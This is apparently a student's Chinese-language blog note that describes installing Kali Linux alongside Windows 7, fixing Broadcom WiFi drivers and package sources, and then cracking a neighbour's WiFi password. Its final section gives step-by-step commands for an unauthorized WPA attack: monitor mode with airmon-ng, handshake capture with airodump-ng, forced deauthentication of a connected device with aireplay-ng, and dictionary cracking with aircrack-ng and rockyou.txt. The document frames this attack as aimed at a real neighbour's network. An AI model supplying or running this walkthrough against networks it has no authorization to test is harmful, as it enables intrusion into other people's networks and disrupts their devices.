win7+ kali linux雙系統 + 無線路由WiFi破解

• 2019 年 10 月 5 日
• 筆記

win7+ kali linux雙系統 + 無線路由WiFi破解

0.導語1.實戰2.無線路由WiFi破解3.作者的話

0.導語

本篇文章寫於本科大二下學期，本篇文章目的是攻破隔壁老王wifi密碼，實現wifi路由密碼的破解，所採用的的系統為linux中的kali，實現為win7+kali雙系統+wifi破解！ 歡迎大家留言，相互交流！

1.實戰

失敗原因分析

前期：失敗—原因：經過多方查文第一次安裝Linux成功，但是引導失敗，原因就是微軟的Easybcd不怎麼支援efi裝的系統，支援legal的系統。於是經過二次實戰。從中午1點半非連續裝機半完美解決於下午2點50 win7+kali Linux雙系統裝成功，並進入了正確引導。

實戰解決

後期實戰：問題：1)kali linux裸裝後無WiFi驅動，無法連接wif;2）kali linux 裸裝後有線由於沒有netkeeper客戶端，故不能上網，故首先解決問題—上網問題.

上網問題完美解決方案：1)經過嘗試後，發現有線可以在機房通過chinanet進行連接，故走WiFi+有線連接方式，未配置dns及子網掩碼之類的，便可以直接上網；2)使用ChinaNet連上網後，查文，翻牆，Google技術論壇，預解決kali linux的無線網路連接問題—–首要安裝無線驅動—-經過命令後，得到本機的驅動為博通bcm43142

解決方案：

1)編輯/etc/apt/sources.list 在文件最後加

deb http://http.debian.net/debian/ jessie main contrib non-free  

2)-5)都是在終端———————– 2)更新源

apt-get update  

3)安裝內核頭文件

apt-get install linux-headers-$(uname -r|sed 's,[^-]*-[^-]*-,,') broadcom-sta-dkms  

4)博通無線網卡驅動

modprobe -r b44 b43 b43legacy ssb brcmsmac  

5)STA driver

modprobe wl  

成功!!!

但是路途並不是這麼暢通：使用apt-get命令過程中報錯解決如下; 解決方案： 1）系統更新—–在sources.list中添加源 命令如下：

leafpad /etc/apt/sources.list  

然後複製粘貼下面的源

#阿里雲kali源  deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib  deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib  deb http://mirrors.aliyun.com/kali-security kali-rolling/updates main contrib non-free  deb-src http://mirrors.aliyun.com/kali-security kali-rolling/updates main contrib non-free    #中科大kali源  deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib  deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib  deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free  deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free `  

然後更新並安裝

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y  

2)安裝內核頭

直接使用上面源來升級內核

如下命令查看版本：

~# uname -r  

這時候使用命令

apt-get install linux-headers-$(uname -r)  

這樣就可以了，但是我實踐的時候碰到下面問題

命令：  apt-get install linux-headers-$(uname -r)  出現如下錯誤：  E: Unable to locate package linux-headers-4.3.0-kali1-amd64  E: Couldn't find any package by glob 'linux-headers-4.3.0-kali1-amd64  E: Couldn't find any package by regex 'linux-headers-4.3.0-kali1-amd64  

翻遍Google,得到解決方案,如下:

1.下載inux-kbuild,鏈接:(http://http.kali.org/kali/pool/main/l/linux-tools/)具體版本參見自己的主機；  2.編譯linux-kbuild;  dkpg -i linux-kbuild-4.3_4.3.1-2kali1_amd64.deb    3.下載linux-header-common和主機版本對應的linux-header。鏈接（http://http.kali.org/kali/pool/main/l/linux/）,具體版本參見自己的主機  4.首先編譯linux-header-common  dkpg -i linux-headers-4.3.0-kali1-common_4.3.3-5kali4_amd64.deb  5.最後編譯linux-header  dkpg -i linux-headers-4.3.0-kali1-amd64_4.3.3-5kali4_amd64.deb  

於是乎，經過百般折騰後，WiFi啟用成功！

網路之旅踏上新征程！

2.無線路由WiFi破解

1）首先斷開連接的wifi 在終端中執行：

# airmon-ng  

上面命令列出了支援監控模式的無線網卡。如果沒有任何輸出，表示無線網卡不支援監控模式。你可以看到我的wlan0支援監控模式。

2）開啟無線網卡的監控模式

# airmon-ng start prism0  

執行成功之後網卡介面變為prism0；可以使用ifconfig命令查看。

3）查看wifi網路

# airodump-ng prism0  

上面列出了周圍的wifi和它們的詳細資訊，包括訊號強度、加密類型、頻道等。要記住要破解wifi的頻道號和BSSID。 按Ctrl-C結束。

4）抓取握手包 使用網卡的監聽模式抓取周圍的無線網路數據包。其中，對我們最重要的數據包是：包含密碼的包－也叫握手包。當有新用戶或斷開用戶自動連接wifi時，會發送握手包。 開始抓包：

# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ prism0  

參數解釋： -c指定頻道號 –bssid指定路由器bssid -w指定抓取的數據包保存位置

5）強制連接到wifi的設備重新連接路由器 現在我們只要等用戶連接/重連接wifi了，運氣不好也許要很長時間。 但是我們是不會等的，這不是耐心黑客該乾的事。有一個叫aireplay-ng的工具，它可以強制用戶斷開wifi連接；原理是，給連接到wifi的一個設備發送一個deauth（反認證）包，讓那個設備斷開wifi，隨後它自然會再次連接wifi。 aireplay-ng的生效前提是，wifi網路中至少有一個連接的設備。從上圖(4)可以看到哪些設備連接到了wifi，STATION就是連接設備的MAC地址，記住一個。 打開新終端執行：

# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C prism0  

參數解釋： -0指定發送反認證包的個數 -a指定無線路由器BSSID -c指定強制斷開的設備

如果成功：

按Ctrl-C結束抓包。 我們已經得到了想要的握手包了，可以結束無線網卡的監控模式了：

# airmon-ng stop prism0  

6) 開始破解密碼

# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap  

參數解釋： -a2代表WPA的握手包 -b指定要破解的wifi BSSID。 -w指定字典文件 最後是抓取的包